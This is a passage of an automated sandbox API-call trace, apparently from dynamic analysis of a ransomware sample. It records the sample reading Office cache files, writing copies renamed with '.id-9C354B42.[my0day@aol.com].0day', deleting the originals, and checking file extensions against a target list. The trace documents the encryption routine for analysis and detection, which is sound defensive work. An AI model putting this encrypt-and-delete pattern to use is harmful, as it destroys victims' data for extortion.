lpNumberOfBytesWritten=0x2c5fc9c, lpOverlapped=0x0 | out: lpBuffer=0x34c0020*, lpNumberOfBytesWritten=0x2c5fc9c*=0xf6, lpOverlapped=0x0) returned 1 [0033.851] SetEndOfFile (hFile=0x188) returned 1 [0033.852] CloseHandle (hObject=0x188) returned 1 [0033.852] SetFilePointerEx (in: hFile=0x184, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c5fec8 | out: lpNewFilePointer=0x0) returned 1 [0033.852] SetEndOfFile (hFile=0x184) returned 1 [0033.853] CloseHandle (hObject=0x184) returned 1 [0033.853] SetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\PowerPointMUI.xml.id-9C354B42.[my0day@aol.com].0day", dwFileAttributes=0x2020) returned 1 [0033.853] DeleteFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\PowerPointMUI.xml" (normalized: "c:\\msocache\\all users\\{90140000-0018-0409-1000-0000000ff1ce}-c\\powerpointmui.xml")) returned 1 [0033.853] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\PowerPointMUI.xml") returned 80 [0033.853] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\PowerPointMUI.xml") returned 80 [0033.853] lstrlenW (lpString=".doc") returned 4 [0033.854] lstrcmpiW (lpString1=".doc", lpString2=".xml") returned -1 [0033.854] lstrlenW (lpString=".docx") returned 5 [0033.854] lstrcmpiW (lpString1=".docx", lpString2="I.xml") returned -1 [0033.854] lstrlenW (lpString=".pdf") returned 4 [0033.854] lstrcmpiW (lpString1=".pdf", lpString2=".xml") returned -1 [0033.854] lstrlenW (lpString=".xls") returned 4 [0033.854] lstrcmpiW (lpString1=".xls", lpString2=".xml") returned -1 [0033.854] lstrlenW (lpString=".xlsx") returned 5 [0033.854] lstrcmpiW (lpString1=".xlsx", lpString2="I.xml") returned -1 [0033.854] lstrlenW (lpString=".ppt") returned 4 [0033.854] lstrcmpiW (lpString1=".ppt", lpString2=".xml") returned -1 [0033.854] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\PowerPointMUI.xml") returned 80 [0033.854] lstrlenW (lpString=".zip") returned 4 [0033.854] lstrcmpiW (lpString1=".zip", lpString2=".xml") returned 1 [0033.854] lstrlenW (lpString=".rar") returned 4 [0033.854] lstrcmpiW (lpString1=".rar", lpString2=".xml") returned -1 [0033.854] lstrlenW (lpString=".bz2") returned 4 [0033.854] lstrcmpiW (lpString1=".bz2", lpString2=".xml") returned -1 [0033.854] lstrlenW (lpString=".7z") returned 3 [0033.854] lstrcmpiW (lpString1=".7z", lpString2="xml") returned -1 [0033.854] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\PowerPointMUI.xml") returned 80 [0033.854] lstrlenW (lpString=".dbf") returned 4 [0033.854] lstrcmpiW (lpString1=".dbf", lpString2=".xml") returned -1 [0033.854] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\PowerPointMUI.xml") returned 80 [0033.854] lstrlenW (lpString=".1cd") returned 4 [0033.854] lstrcmpiW (lpString1=".1cd", lpString2=".xml") returned -1 [0033.854] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\PowerPointMUI.xml") returned 80 [0033.854] lstrlenW (lpString=".jpg") returned 4 [0033.854] lstrcmpiW (lpString1=".jpg", lpString2=".xml") returned -1 [0033.855] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\PowerPointMUI.xml") returned 80 [0033.855] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\PowerPointMUI.xml") returned 80 [0033.855] lstrlenW (lpString=".doc") returned 4 [0033.855] lstrcmpiW (lpString1=".doc", lpString2=".xml") returned -1 [0033.855] lstrlenW (lpString=".docx") returned 5 [0033.855] lstrcmpiW (lpString1=".docx", lpString2="I.xml") returned -1 [0033.855] lstrlenW (lpString=".pdf") returned 4 [0033.855] lstrcmpiW (lpString1=".pdf", lpString2=".xml") returned -1 [0033.855] lstrlenW (lpString=".xls") returned 4 [0033.855] lstrcmpiW (lpString1=".xls", lpString2=".xml") returned -1 [0033.855] lstrlenW (lpString=".xlsx") returned 5 [0033.855] lstrcmpiW (lpString1=".xlsx", lpString2="I.xml") returned -1 [0033.855] lstrlenW (lpString=".ppt") returned 4 [0033.855] lstrcmpiW (lpString1=".ppt", lpString2=".xml") returned -1 [0033.855] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\PowerPointMUI.xml") returned 80 [0033.855] lstrlenW (lpString=".zip") returned 4 [0033.855] lstrcmpiW (lpString1=".zip", lpString2=".xml") returned 1 [0033.855] lstrlenW (lpString=".rar") returned 4 [0033.855] lstrcmpiW (lpString1=".rar", lpString2=".xml") returned -1 [0033.855] lstrlenW (lpString=".bz2") returned 4 [0033.855] lstrcmpiW (lpString1=".bz2", lpString2=".xml") returned -1 [0033.855] lstrlenW (lpString=".7z") returned 3 [0033.855] lstrcmpiW (lpString1=".7z", lpString2="xml") returned -1 [0033.855] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\PowerPointMUI.xml") returned 80 [0033.855] lstrlenW (lpString=".dbf") returned 4 [0033.855] lstrcmpiW (lpString1=".dbf", lpString2=".xml") returned -1 [0033.855] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\PowerPointMUI.xml") returned 80 [0033.856] lstrlenW (lpString=".1cd") returned 4 [0033.856] lstrcmpiW (lpString1=".1cd", lpString2=".xml") returned -1 [0033.856] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\PowerPointMUI.xml") returned 80 [0033.856] lstrlenW (lpString=".jpg") returned 4 [0033.856] lstrcmpiW (lpString1=".jpg", lpString2=".xml") returned -1 [0033.856] lstrcmpiW (lpString1=".xml", lpString2=".0day") returned 1 [0033.856] lstrlenW (lpString="Setup.xml") returned 9 [0033.856] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\Setup.xml" (normalized: "c:\\msocache\\all users\\{90140000-0018-0409-1000-0000000ff1ce}-c\\setup.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x184 [0033.856] GetFileSizeEx (in: hFile=0x184, lpFileSize=0x2c5ff1c | out: lpFileSize=0x2c5ff1c*=1886) returned 1 [0033.856] CloseHandle (hObject=0x184) returned 1 [0033.856] GetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\Setup.xml" (normalized: "c:\\msocache\\all users\\{90140000-0018-0409-1000-0000000ff1ce}-c\\setup.xml")) returned 0x2020 [0033.856] GetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\Setup.xml.id-9C354B42.[my0day@aol.com].0day" (normalized: "c:\\msocache\\all users\\{90140000-0018-0409-1000-0000000ff1ce}-c\\setup.xml.id-9c354b42.[my0day@aol.com].0day")) returned 0xffffffff [0033.856] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\Setup.xml" (normalized: "c:\\msocache\\all users\\{90140000-0018-0409-1000-0000000ff1ce}-c\\setup.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x184 [0033.856] SetFilePointerEx (in: hFile=0x184, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c5fec8 | out: lpNewFilePointer=0x0) returned 1 [0033.857] SetFilePointerEx (in: hFile=0x184, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c5fec8 | out: lpNewFilePointer=0x0) returned 1 [0033.857] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\Setup.xml.id-9C354B42.[my0day@aol.com].0day" (normalized: "c:\\msocache\\all users\\{90140000-0018-0409-1000-0000000ff1ce}-c\\setup.xml.id-9c354b42.[my0day@aol.com].0day"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x188 [0033.857] GetLastError () returned 0x0 [0033.857] ReadFile (in: hFile=0x184, lpBuffer=0x34c0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2c5fed4, lpOverlapped=0x0 | out: lpBuffer=0x34c0020*, lpNumberOfBytesRead=0x2c5fed4*=0x75e, lpOverlapped=0x0) returned 1 [0034.100] WriteFile (in: hFile=0x188, lpBuffer=0x34c0020*, nNumberOfBytesToWrite=0x760, lpNumberOfBytesWritten=0x2c5fc9c, lpOverlapped=0x0 | out: lpBuffer=0x34c0020*, lpNumberOfBytesWritten=0x2c5fc9c*=0x760, lpOverlapped=0x0) returned 1 [0034.101] ReadFile (in: hFile=0x184, lpBuffer=0x34c0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2c5fed4, lpOverlapped=0x0 | out: lpBuffer=0x34c0020*, lpNumberOfBytesRead=0x2c5fed4*=0x0, lpOverlapped=0x0) returned 1 [0034.101] WriteFile (in: hFile=0x188, lpBuffer=0x34c0020*, nNumberOfBytesToWrite=0xe6, lpNumberOfBytesWritten=0x2c5fc9c, lpOverlapped=0x0 | out: lpBuffer=0x34c0020*, lpNumberOfBytesWritten=0x2c5fc9c*=0xe6, lpOverlapped=0x0) returned 1 [0034.101] SetEndOfFile (hFile=0x188) returned 1 [0034.101] CloseHandle (hObject=0x188) returned 1 [0034.102] SetFilePointerEx (in: hFile=0x184, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c5fec8 | out: lpNewFilePointer=0x0) returned 1 [0034.102] SetEndOfFile (hFile=0x184) returned 1 [0034.103] CloseHandle (hObject=0x184) returned 1 [0034.103] SetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\Setup.xml.id-9C354B42.[my0day@aol.com].0day", dwFileAttributes=0x2020) returned 1 [0034.103] DeleteFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\Setup.xml" (normalized: "c:\\msocache\\all users\\{90140000-0018-0409-1000-0000000ff1ce}-c\\setup.xml")) returned 1 [0034.396] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\Setup.xml") returned 72 [0034.396] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\Setup.xml") returned 72 [0034.397] lstrlenW (lpString=".doc") returned 4 [0034.397] lstrcmpiW (lpString1=".doc", lpString2=".xml") returned -1 [0034.397] lstrlenW (lpString=".docx") returned 5 [0034.397] lstrcmpiW (lpString1=".docx", lpString2="p.xml") returned -1 [0034.397] lstrlenW (lpString=".pdf") returned 4 [0034.397] lstrcmpiW (lpString1=".pdf", lpString2=".xml") returned -1 [0034.397] lstrlenW (lpString=".xls") returned 4 [0034.397] lstrcmpiW (lpString1=".xls", lpString2=".xml") returned -1 [0034.397] lstrlenW (lpString=".xlsx") returned 5 [0034.397] lstrcmpiW (lpString1=".xlsx", lpString2="p.xml") returned -1 [0034.397] lstrlenW (lpString=".ppt") returned 4 [0034.397] lstrcmpiW (lpString1=".ppt", lpString2=".xml") returned -1 [0034.397] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\Setup.xml") returned 72 [0034.397] lstrlenW (lpString=".zip") returned 4 [0034.397] lstrcmpiW (lpString1=".zip", lpString2=".xml") returned 1 [0034.397] lstrlenW (lpString=".rar") returned 4 [0034.397] lstrcmpiW (lpString1=".rar", lpString2=".xml") returned -1 [0034.397] lstrlenW (lpString=".bz2") returned 4 [0034.397] lstrcmpiW (lpString1=".bz2", lpString2=".xml") returned -1 [0034.397] lstrlenW (lpString=".7z") returned 3 [0034.397] lstrcmpiW (lpString1=".7z", lpString2="xml") returned -1 [0034.397] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\Setup.xml") returned 72 [0034.397] lstrlenW (lpString=".dbf") returned 4 [0034.397] lstrcmpiW (lpString1=".dbf", lpString2=".xml") returned -1 [0034.397] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\Setup.xml") returned 72 [0034.397] lstrlenW (lpString=".1cd") returned 4 [0034.397] lstrcmpiW (lpString1=".1cd", lpString2=".xml") returned -1 [0034.397] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\Setup.xml") returned 72 [0034.397] lstrlenW (lpString=".jpg") returned 4 [0034.397] lstrcmpiW (lpString1=".jpg", lpString2=".xml") returned -1 [0034.397] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\Setup.xml") returned 72 [0034.397] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\Setup.xml") returned 72 [0034.397] lstrlenW (lpString=".doc") returned 4 [0034.397] lstrcmpiW (lpString1=".doc", lpString2=".xml") returned -1 [0034.398] lstrlenW (lpString=".docx") returned 5 [0034.398] lstrcmpiW (lpString1=".docx", lpString2="p.xml") returned -1 [0034.398] lstrlenW (lpString=".pdf") returned 4 [0034.398] lstrcmpiW (lpString1=".pdf", lpString2=".xml") returned -1 [0034.398] lstrlenW (lpString=".xls") returned 4 [0034.398] lstrcmpiW (lpString1=".xls", lpString2=".xml") returned -1 [0034.398] lstrlenW (lpString=".xlsx") returned 5 [0034.398] lstrcmpiW (lpString1=".xlsx", lpString2="p.xml") returned -1 [0034.398] lstrlenW (lpString=".ppt") returned 4 [0034.398] lstrcmpiW (lpString1=".ppt", lpString2=".xml") returned -1 [0034.398] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\Setup.xml") returned 72 [0034.398] lstrlenW (lpString=".zip") returned 4 [0034.398] lstrcmpiW (lpString1=".zip", lpString2=".xml") returned 1 [0034.398] lstrlenW (lpString=".rar") returned 4 [0034.398] lstrcmpiW (lpString1=".rar", lpString2=".xml") returned -1 [0034.398] lstrlenW (lpString=".bz2") returned 4 [0034.398] lstrcmpiW (lpString1=".bz2", lpString2=".xml") returned -1 [0034.398] lstrlenW (lpString=".7z") returned 3 [0034.398] lstrcmpiW (lpString1=".7z", lpString2="xml") returned -1 [0034.398] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\Setup.xml") returned 72 [0034.398] lstrlenW (lpString=".dbf") returned 4 [0034.398] lstrcmpiW (lpString1=".dbf", lpString2=".xml") returned -1 [0034.398] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\Setup.xml") returned 72 [0034.398] lstrlenW (lpString=".1cd") returned 4 [0034.398] lstrcmpiW (lpString1=".1cd", lpString2=".xml") returned -1 [0034.398] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\Setup.xml") returned 72 [0034.398] lstrlenW (lpString=".jpg") returned 4 [0034.398] lstrcmpiW (lpString1=".jpg", lpString2=".xml") returned -1 [0034.398] Sleep (dwMilliseconds=0x64) [0034.580] lstrcmpiW (lpString1=".xml", lpString2=".0day") returned 1 [0034.580] lstrlenW (lpString="VisioMUI.xml") returned 12 [0034.580] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\VisioMUI.xml" (normalized: "c:\\msocache\\all users\\{90140000-0054-0409-1000-0000000ff1ce}-c\\visiomui.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1a0 [0034.741] GetFileSizeEx (in: hFile=0x1a0, lpFileSize=0x2c5ff1c | out: lpFileSize=0x2c5ff1c*=9503) returned 1 [0034.741] CloseHandle (hObject=0x1a0) returned 1 [0034.741] GetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\VisioMUI.xml" (normalized: "c:\\msocache\\all users\\{90140000-0054-0409-1000-0000000ff1ce}-c\\visiomui.xml")) returned 0x2020 [0034.741] GetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\VisioMUI.xml.id-9C354B42.[my0day@aol.com].0day" (normalized: "c:\\msocache\\all users\\{90140000-0054-0409-1000-0000000ff1ce}-c\\visiomui.xml.id-9c354b42.[my0day@aol.com].0day")) returned 0xffffffff [0034.741] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\VisioMUI.xml" (normalized: "c:\\msocache\\all users\\{90140000-0054-0409-1000-0000000ff1ce}-c\\visiomui.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1a0 [0034.741] SetFilePointerEx (in: hFile=0x1a0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c5fec8 | out: lpNewFilePointer=0x0) returned 1 [0034.741] SetFilePointerEx (in: hFile=0x1a0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c5fec8 | out: lpNewFilePointer=0x0) returned 1 [0034.741] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\VisioMUI.xml.id-9C354B42.[my0day@aol.com].0day" (normalized: "c:\\msocache\\all users\\{90140000-0054-0409-1000-0000000ff1ce}-c\\visiomui.xml.id-9c354b42.[my0day@aol.com].0day"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1a8 [0034.741] GetLastError () returned 0x0 [0034.741] ReadFile (in: hFile=0x1a0, lpBuffer=0x34c0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2c5fed4, lpOverlapped=0x0 | out: lpBuffer=0x34c0020*, lpNumberOfBytesRead=0x2c5fed4*=0x251f, lpOverlapped=0x0) returned 1 [0034.743] WriteFile (in: hFile=0x1a8, lpBuffer=0x34c0020*, nNumberOfBytesToWrite=0x2520, lpNumberOfBytesWritten=0x2c5fc9c, lpOverlapped=0x0 | out: lpBuffer=0x34c0020*, lpNumberOfBytesWritten=0x2c5fc9c*=0x2520, lpOverlapped=0x0) returned 1 [0034.744] ReadFile (in: hFile=0x1a0, lpBuffer=0x34c0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2c5fed4, lpOverlapped=0x0 | out: lpBuffer=0x34c0020*, lpNumberOfBytesRead=0x2c5fed4*=0x0, lpOverlapped=0x0) returned 1 [0034.744] WriteFile (in: hFile=0x1a8, lpBuffer=0x34c0020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x2c5fc9c, lpOverlapped=0x0 | out: lpBuffer=0x34c0020*, lpNumberOfBytesWritten=0x2c5fc9c*=0xec, lpOverlapped=0x0) returned 1 [0034.744] SetEndOfFile (hFile=0x1a8) returned 1 [0034.744] CloseHandle (hObject=0x1a8) returned 1 [0034.745] SetFilePointerEx (in: hFile=0x1a0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c5fec8 | out: lpNewFilePointer=0x0) returned 1 [0034.745] SetEndOfFile (hFile=0x1a0) returned 1 [0034.746] CloseHandle (hObject=0x1a0) returned 1 [0034.746] SetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\VisioMUI.xml.id-9C354B42.[my0day@aol.com].0day", dwFileAttributes=0x2020) returned 1 [0034.746] DeleteFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\VisioMUI.xml" (normalized: "c:\\msocache\\all users\\{90140000-0054-0409-1000-0000000ff1ce}-c\\visiomui.xml")) returned 1 [0034.746] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\VisioMUI.xml") returned 75 [0034.746] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\VisioMUI.xml") returned 75 [0034.746] lstrlenW (lpString=".doc") returned 4 [0034.746] lstrcmpiW (lpString1=".doc", lpString2=".xml") returned -1 [0034.746] lstrlenW (lpString=".docx") returned 5 [0034.746] lstrcmpiW (lpString1=".docx", lpString2="I.xml") returned -1 [0034.747] lstrlenW (lpString=".pdf") returned 4 [0034.747] lstrcmpiW (lpString1=".pdf", lpString2=".xml") returned -1 [0034.747] lstrlenW (lpString=".xls") returned 4 [0034.747] lstrcmpiW (lpString1=".xls", lpString2=".xml") returned -1 [0034.747] lstrlenW (lpString=".xlsx") returned 5 [0034.747] lstrcmpiW (lpString1=".xlsx", lpString2="I.xml") returned -1 [0034.747] lstrlenW (lpString=".ppt") returned 4 [0034.747] lstrcmpiW (lpString1=".ppt", lpString2=".xml") returned -1 [0034.747] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\VisioMUI.xml") returned 75 [0034.747] lstrlenW (lpString=".zip") returned 4 [0034.747] lstrcmpiW (lpString1=".zip", lpString2=".xml") returned 1 [0034.747] lstrlenW (lpString=".rar") returned 4 [0034.747] lstrcmpiW (lpString1=".rar", lpString2=".xml") returned -1 [0034.747] lstrlenW (lpString=".bz2") returned 4 [0034.747] lstrcmpiW (lpString1=".bz2", lpString2=".xml") returned -1 [0034.747] lstrlenW (lpString=".7z") returned 3 [0034.747] lstrcmpiW (lpString1=".7z", lpString2="xml") returned -1 [0034.747] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\VisioMUI.xml") returned 75 [0034.747] lstrlenW (lpString=".dbf") returned 4 [0034.747] lstrcmpiW (lpString1=".dbf", lpString2=".xml") returned -1 [0034.747] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\VisioMUI.xml") returned 75 [0034.747] lstrlenW (lpString=".1cd") returned 4 [0034.747] lstrcmpiW (lpString1=".1cd", lpString2=".xml") returned -1 [0034.747] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\VisioMUI.xml") returned 75 [0034.747] lstrlenW (lpString=".jpg") returned 4 [0034.747] lstrcmpiW (lpString1=".jpg", lpString2=".xml") returned -1 [0034.747] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\VisioMUI.xml") returned 75 [0034.747] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\VisioMUI.xml") returned 75 [0034.747] lstrlenW (lpString=".doc") returned 4 [0034.747] lstrcmpiW (lpString1=".doc", lpString2=".xml") returned -1 [0034.747] lstrlenW (lpString=".docx") returned 5 [0034.747] lstrcmpiW (lpString1=".docx", lpString2="I.xml") returned -1 [0034.747] lstrlenW (lpString=".pdf") returned 4 [0034.748] lstrcmpiW (lpString1=".pdf", lpString2=".xml") returned -1 [0034.748] lstrlenW (lpString=".xls") returned 4 [0034.748] lstrcmpiW (lpString1=".xls", lpString2=".xml") returned -1 [0034.748] lstrlenW (lpString=".xlsx") returned 5 [0034.748] lstrcmpiW (lpString1=".xlsx", lpString2="I.xml") returned -1 [0034.748] lstrlenW (lpString=".ppt") returned 4 [0034.748] lstrcmpiW (lpString1=".ppt", lpString2=".xml") returned -1 [0034.748] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\VisioMUI.xml") returned 75 [0034.748] lstrlenW (lpString=".zip") returned 4 [0034.748] lstrcmpiW (lpString1=".zip", lpString2=".xml") returned 1 [0034.748] lstrlenW (lpString=".rar") returned 4 [0034.748] lstrcmpiW (lpString1=".rar", lpString2=".xml") returned -1 [0034.748] lstrlenW (lpString=".bz2") returned 4 [0034.748] lstrcmpiW (lpString1=".bz2", lpString2=".xml") returned -1 [0034.748] lstrlenW (lpString=".7z") returned 3 [0034.748] lstrcmpiW (lpString1=".7z", lpString2="xml") returned -1 [0034.748] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\VisioMUI.xml") returned 75 [0034.748] lstrlenW (lpString=".dbf") returned 4 [0034.748] lstrcmpiW (lpString1=".dbf", lpString2=".xml") returned -1 [0034.748] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\VisioMUI.xml") returned 75 [0034.748] lstrlenW (lpString=".1cd") returned 4 [0034.748] lstrcmpiW (lpString1=".1cd", lpString2=".xml") returned -1 [0034.748] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\VisioMUI.xml") returned 75 [0034.748] lstrlenW (lpString=".jpg") returned 4 [0034.748] lstrcmpiW (lpString1=".jpg", lpString2=".xml") returned -1 [0034.748] lstrcmpiW (lpString1=".xml", lpString2=".0day") returned 1 [0034.748] lstrlenW (lpString="GrooveMUI.xml") returned 13 [0034.748] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-00BA-0409-1000-0000000FF1CE}-C\\GrooveMUI.xml" (normalized: "c:\\msocache\\all users\\{90140000-00ba-0409-1000-0000000ff1ce}-c\\groovemui.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1a0 [0034.750] GetFileSizeEx (in: hFile=0x1a0, lpFileSize=0x2c5ff1c | out: lpFileSize=0x2c5ff1c*=913) returned 1 [0034.750] CloseHandle (hObject=0x1a0) returned 1 [0034.750] GetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{90140000-00BA-0409-1000-0000000FF1CE}-C\\GrooveMUI.xml" (normalized: "c:\\msocache\\all users\\{90140000-00ba-0409-1000-0000000ff1ce}-c\\groovemui.xml")) returned 0x2020 [0034.750] GetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{90140000-00BA-0409-1000-0000000FF1CE}-C\\GrooveMUI.xml.id-9C354B42.[my0day@aol.com].0day" (normalized: "c:\\msocache\\all users\\{90140000-00ba-0409-1000-0000000ff1ce}-c\\groovemui.xml.id-9c354b42.[my0day@aol.com].0day")) returned 0xffffffff [0034.750] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-00BA-0409-1000-0000000FF1CE}-C\\GrooveMUI.xml" (normalized: "c:\\msocache\\all users\\{90140000-00ba-0409-1000-0000000ff1ce}-c\\groovemui.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1a0 [0034.750] SetFilePointerEx (in: hFile=0x1a0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c5fec8 | out: lpNewFilePointer=0x0) returned 1 [0034.750] SetFilePointerEx (in: hFile=0x1a0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c5fec8 | out: lpNewFilePointer=0x0) returned 1 [0034.750] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-00BA-0409-1000-0000000FF1CE}-C\\GrooveMUI.xml.id-9C354B42.[my0day@aol.com].0day" (normalized: "c:\\msocache\\all users\\{90140000-00ba-0409-1000-0000000ff1ce}-c\\groovemui.xml.id-9c354b42.[my0day@aol.com].0day"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1a8 [0034.751] GetLastError () returned 0x0 [0034.751] ReadFile (in: hFile=0x1a0, lpBuffer=0x34c0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2c5fed4, lpOverlapped=0x0 | out: lpBuffer=0x34c0020*, lpNumberOfBytesRead=0x2c5fed4*=0x391, lpOverlapped=0x0) returned 1 [0034.752] WriteFile (in: hFile=0x1a8, lpBuffer=0x34c0020*, nNumberOfBytesToWrite=0x3a0, lpNumberOfBytesWritten=0x2c5fc9c, lpOverlapped=0x0 | out: lpBuffer=0x34c0020*, lpNumberOfBytesWritten=0x2c5fc9c*=0x3a0, lpOverlapped=0x0) returned 